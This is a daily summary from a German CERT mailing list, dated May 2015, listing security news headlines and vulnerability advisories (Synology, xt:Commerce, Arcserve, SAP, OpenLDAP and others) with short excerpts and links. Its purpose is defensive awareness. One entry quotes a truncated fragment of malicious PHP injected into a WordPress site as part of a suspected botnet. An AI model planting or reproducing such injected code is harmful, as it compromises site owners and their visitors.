[CERT-daily] Tageszusammenfassung - Mittwoch 27-05-2015

Wed May 27 18:32:11 CEST 2015

=======================
= End-of-Shift report =
=======================

Timeframe:   Dienstag 26-05-2015 18:00 − Mittwoch 27-05-2015 18:00
Handler:     Stephan Richter
Co-Handler:  n/a


*** This is not the UEFI backdoor you are looking for ***
---------------------------------------------
This is currently the top story on the Linux subreddit. It links to this Tweet which demonstrates using a System Management Mode backdoor to perform privilege escalation under Linux. This is not a story.But first, some background. System Management Mode (SMM) is a feature in most x86 processors since the 386SL back in 1990. It allows for certain events to cause the CPU to stop executing the OS, jump to an area of hidden RAM and execute code there instead, and then hand off back to the OS...
---------------------------------------------
http://mjg59.dreamwidth.org/35110.html


*** Breach detection: Five fatal flaws and how to avoid them ***
---------------------------------------------
When the Sarbanes-Oxley Act of 2002 was passed, it fell on corporate security teams to translate its requirements into technical controls. That threw the IT Security function into the deep end of the ...
---------------------------------------------
http://feedproxy.google.com/~r/HelpNetSecurity/~3/uoHRSOyKltE/article.php


*** Five Mistakes MSSPs Should Avoid ***
---------------------------------------------
MSSPs, or Managed Security Service Providers, are at an exciting point where market acceptance, awareness and demand have converged. I view this as a positive for a potential MSSP but also for the customers and businesses they will protect, enhancing security for everyone. However, excitement and the prospect of profits can create haste, and with haste comes an increased risk of mistakes. In my role at AlienVault, Ive been fortunate enough to work with and help ensure the success of a number of...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/five-mistakes-mssps-should-avoid


*** Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities ***
---------------------------------------------
Docker Hub is a central repository for Docker developers to pull and push container images. We performed a detailed study on Docker Hub images to understand how vulnerable they are to security threats. Surprisingly, we found that more than 30% of official repositories contain images that are highly susceptible to a variety of security attacks (e.g., Shellshock, Heartbleed, Poodle, etc.). For general images...
---------------------------------------------
http://www.banyanops.com/blog/analyzing-docker-hub/


*** Jetzt patchen: Synology-NAS über Fotoalbum angreifbar ***
---------------------------------------------
Synologys Web-Fotoalbum Photo Station gewährt Angreifern ungewollt Zugriff auf DiskStation NAS-Systeme. Wer nicht will, dass Fremde beliebigen Code auf dem eigenen NAS ausführen, sollte den Patch des Herstellers jetzt einspielen.
---------------------------------------------
http://heise.de/-2668853


*** How to Prevent a Domain Name Theft ***
---------------------------------------------
1. Introduction The domain names may cost far more than a real estate. For instance, Facebook paid USD 8.5 million to buy fb.com. The high prices of the domain names attract not only businesses, but also thieves. The domain name theft can be huge trouble for companies because it effects their brand and reputation. This...
---------------------------------------------
http://resources.infosecinstitute.com/how-to-prevent-a-domain-name-theft/


*** SQL-Injection-Lücke in xt:Commerce ***
---------------------------------------------
Sicherheitsupdates schließen in der Shop-Software eine Lücke, durch die Angreifer potenziell Datenbankbefehle einschleusen können.
---------------------------------------------
http://heise.de/-2667569


*** Possible Wordpress Botnet C&C: errorcontent.com, (Tue, May 26th) ***
---------------------------------------------
Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):  #2b8008# ">">/* turn off error reporting */ @ini_set(display_errors ">/* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) {
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=19733&rss


*** Researchers Exploit Patched Windows Group Policy Bug ***
---------------------------------------------
Researchers from Core Security were able to exploit a security vulnerability in Windows group policy -- MS15-011 -- that was patched by Microsoft in February.
---------------------------------------------
http://threatpost.com/researchers-exploit-patched-windows-group-policy-bug/113000


*** Online-Dienst erstellt maßgeschneiderte Krypto-Trojaner ***
---------------------------------------------
Die Einstiegshürde für angehende Online-Erpresser ist erneut gesunken: Ein Dienst im Tor-Netz erstellt nach wenigen Klicks den individuellen Erpressungs-Trojaner. Falls ein Opfer das geforderte Lösegeld zahlt, verdienen die Betreiber mit.
---------------------------------------------
http://heise.de/-2668860


*** Security: Zwei neue Exploits auf Router entdeckt ***
---------------------------------------------
Unsichere Router sind aktuell von gleich zwei Versionen von Malware bedroht. Die eine verteilt Spam über soziale Medien, die andere leitet Anfragen auf manipulierte Webseiten um. (Router, Virus)
---------------------------------------------
http://www.golem.de/news/security-zwei-neue-exploits-auf-router-entdeckt-1505-114294-rss.html


*** extjs Arbitrary File Read / ssrf Vulnerability ***
---------------------------------------------
Topic: extjs Arbitrary File Read / ssrf Vulnerability Risk: High Text:Hi all： Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2015050162


*** USN-2622-1: OpenLDAP vulnerabilities ***
---------------------------------------------
Ubuntu Security Notice USN-2622-126th May, 2015openldap vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04 Ubuntu 14.10 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryOpenLDAP could be made to crash if it received specially crafted networktraffic.Software description openldap - OpenLDAP utilities  DetailsIt was discovered that OpenLDAP incorrectly handled certain search queriesthat returned empty attributes. A remote attacker could use this issue tocause...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2622-1/


*** Cisco IP Phone 7861 Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/viewAlert.x?alertId=39011


*** ZDI-15-240: Dell NetVault Backup Heap Buffer Overflow Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell NetVault Backup. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/y6osEWmyti0/


*** ZDI-15-244: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicies Information Disclosure Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/NFGleCbsATc/


*** ZDI-15-243: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicy Information Disclosure Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/OV8j2fD9GSM/


*** ZDI-15-242: Arcserve Unified Data Protection Management Service exportServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/CxxqPV5u-0s/


*** ZDI-15-241: Arcserve Unified Data Protection Management Service reportFileServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/MNmtjnSQ_b4/


*** SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information ***
---------------------------------------------
SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
---------------------------------------------
http://www.securitytracker.com/id/1032402


*** Security Advisory: Point-to-Point Protocol (PPP) vulnerability CVE-2015-3310 ***
---------------------------------------------
(SOL16686)
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/16000/600/sol16686.html?ref=rss


*** lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries ***
---------------------------------------------
lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries
---------------------------------------------
http://www.securitytracker.com/id/1032405


*** Rockwell Automation RSView32 Weak Encryption Algorithm on Passwords ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on May 12, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for a password encryption vulnerability in RSView32.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-132-02


*** Thycotic Password Manager Secret Server iOS Application MITM ***
---------------------------------------------
Topic: Thycotic Password Manager Secret Server iOS Application MITM Risk: Medium Text:Thycotic Password Manager Secret Server iOS Application - MITM SSL Certificate Vulnerability -- http://www.info-sec.ca/adviso...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2015050167